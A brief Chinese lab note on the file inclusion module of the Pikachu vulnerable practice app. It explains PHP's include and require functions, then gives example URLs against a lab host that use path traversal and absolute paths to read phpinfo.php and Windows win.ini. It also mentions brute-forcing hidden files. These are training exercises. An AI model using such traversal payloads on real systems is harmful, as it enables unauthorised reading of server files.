pikachu(文件包含)

1.php中文件包含主要有以下四种函数：

require()，找不到被包含的文件时会产生致命错误，并停止脚本运行。
include()，找不到被包含的文件时只会产生警告，脚本将继续运行。
include_once()与include()类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。
require_once()与require()类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。

本地包含：http://10.0.0.128/pikachu/vul/fileinclude/fi_local.php?filename=../../../../phpinfo.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

使用工具爆破隐藏文件。

还可以读取不同文件夹的内容：http://10.0.0.128/pikachu/vul/fileinclude/fi_local.php?filename=C:/../../../../Windows\win.ini&submit=%E6%8F%90%E4%BA%A

本地包含绝对路径：http://10.0.0.128/pikachu/vul/fileinclude/fi_remote.php?filename=C:\phpStudy\PHPTutorial\WWW\phpinfo.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

读取其他文件夹路径：http://10.0.0.128/pikachu/vul/fileinclude/fi_remote.php?filename=c:Windows\win.ini&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2